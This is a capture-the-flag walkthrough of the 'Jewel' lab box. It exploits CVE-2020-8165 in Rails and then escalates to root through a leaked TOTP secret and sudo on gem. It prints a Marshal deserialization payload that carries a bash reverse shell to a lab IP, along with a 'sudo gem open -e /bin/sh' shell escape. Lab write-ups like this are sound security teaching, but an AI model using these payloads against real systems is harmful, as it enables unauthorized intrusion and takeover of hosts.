Jewel is a medium Windows box. Its main part is source code review.
ENUMERATION
NMAP
Let's start with an Nmap scan:
Nmap scan report for 10.10.10.211
Host is up (0.040s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
| 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open http Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: 10.10.10.211 Git
|_Requested resource was http://10.10.10.211:8000/gitweb/
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
| http-methods:
|_ Supported Methods: HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see that the host's name is jewel.htb, which can be put into the /etc/hosts file. Apart from that, there are two web services running.
WebServer (manual Enum)
On port 8000, gitweb is running. It is not vulnerable itself, but it lets us peek at the source code of the web service running on port 8080.
Checking bd.sql reveals usernames and passwords of potential users.
Brute-forcing them against rockyou.txt did not work.
Let's check the Gemfile:
Checking the Ruby and Rails versions in the Gemfile reveals that Rails is running an older, vulnerable version (5.2.2.1), and a PoC is already available: https://github.com/masahiro331/CVE-2020-8165
https://groups.google.com/g/rubyonrails-security/c/bv6fW4S0Y1c?pli=1
Checking the source code shows that raw user input is accepted and parsed; the vulnerable code is in the update action:
def update
  @user = User.find(params[:id])
  if @user && @user == current_user
    cache = ActiveSupport::Cache::RedisCacheStore.new(url: "redis://127.0.0.1:6379/0")
    cache.delete("username_#{session[:user_id]}")
    @current_username = cache.fetch("username_#{session[:user_id]}", raw: true) {user_params[:username]}
    if @user.update(user_params)
      flash[:success] = "Your account was updated successfully"
      redirect_to articles_path
    else
      cache.delete("username_#{session[:user_id]}")
      render 'edit'
    end
  else
    flash[:danger] = "Not authorized"
    redirect_to articles_path
  end
end
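As an added illustration (not code from the box, from Rails or from the PoC), the following plain Ruby mimics the cache mismatch behind CVE-2020-8165: the username is written with raw: true, but the vulnerable read path still runs the stored bytes through Marshal.load, so the client picks which class gets instantiated. ToyCacheStore, AuditMarker and the helper names are made up for this example; the hardened read honours the raw flag and returns a plain String.

```ruby
# Toy cache written for this illustration (not Rails, not the box's code);
# it mimics the CVE-2020-8165 read/write mismatch in plain Ruby.
class AuditMarker   # harmless stand-in for "whatever class the input names"
  def initialize(note); @note = note; end
end

class ToyCacheStore
  def initialize; @store = {}; end

  # `raw: true` stores the value verbatim; otherwise it is Marshal-serialized.
  def write(key, value, raw: false)
    @store[key] = raw ? value.to_s : Marshal.dump(value)
  end

  # Vulnerable read: everything stored goes through Marshal.load, so a raw
  # entry that happens to be valid Marshal data gets deserialized.
  def read_vulnerable(key)
    data = @store[key]
    data && Marshal.load(data)
  end

  # Hardened read: the caller says whether the entry is raw, and a raw entry
  # comes back as a plain String, never deserialized.
  def read_hardened(key, raw: false)
    data = @store[key]
    return nil unless data
    raw ? data : Marshal.load(data)
  end
end

# Constructed "username": Marshal bytes describing an object the client chose.
UNTRUSTED_USERNAME = Marshal.dump(AuditMarker.new("chosen by the client"))

def seeded_cache
  ToyCacheStore.new.tap { |c| c.write("username_1", UNTRUSTED_USERNAME, raw: true) }
end

# The vulnerable path instantiates the client-chosen class on read.
def vulnerable_result_class
  seeded_cache.read_vulnerable("username_1").class   # => AuditMarker
end

# The hardened path hands the bytes back as a String and builds nothing.
def hardened_result
  seeded_cache.read_hardened("username_1", raw: true)  # => UNTRUSTED_USERNAME
end
```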
So we can exploit the application running on port 8080. Let's do that next.
EXPLOITATION
RAILS (Vulnerable to RCE - CVE-2020-8165)
Following exploit will be used: https://github.com/masahiro331/CVE-2020-8165
We need to register, log in and change the username. Capturing the request in Burp:
Create the payload using Ruby. I used version 2.7.2, but I had to run bundle install first.
$ bundle exec rails console
irb(main):> code = '`bash -c "bash -i >& /dev/tcp/10.10.14.10/9999 0>&1"`'
irb(main):> erb = ERB.allocate
irb(main):> erb.instance_variable_set :@src, code
irb(main):> erb.instance_variable_set :@filename, "1"
irb(main):> erb.instance_variable_set :@lineno, 1
irb(main):> payload=Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
irb(main):>
irb(main):> puts "Payload"
irb(main):> require 'uri'
irb(main):> puts URI.encode_www_form(payload: payload)
Put the payload printed by the script into the username field (I am not sure whether it is better to do this in Repeater):
If everything was done correctly, a reverse shell should pop.
PRIVILEGE ESCALATION
Enumeration
After the shell popped, I ran linpeas.sh. Long story short: it found an interesting file in /var/backups, dump_2020-08-27.sql.
It reveals two new hashes for the users bill and jennifer, one of which can be brute-forced (hashcat mode 3200, bcrypt):
Bill’s credentials work with SSH.
Google Authenticator
After logging in as bill, a .google_authenticator file can be found in his home directory.
bill@jewel:~$ cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
The string 2UQ… is the secret used to issue one-time passwords.
I installed the authenticator into Chrome and a code was issued (I live in the EU; if you live elsewhere you may need to adjust the time!).
So I was able to run sudo gem open -e "/bin/sh -c /bin/sh" rdoc and get root privileges.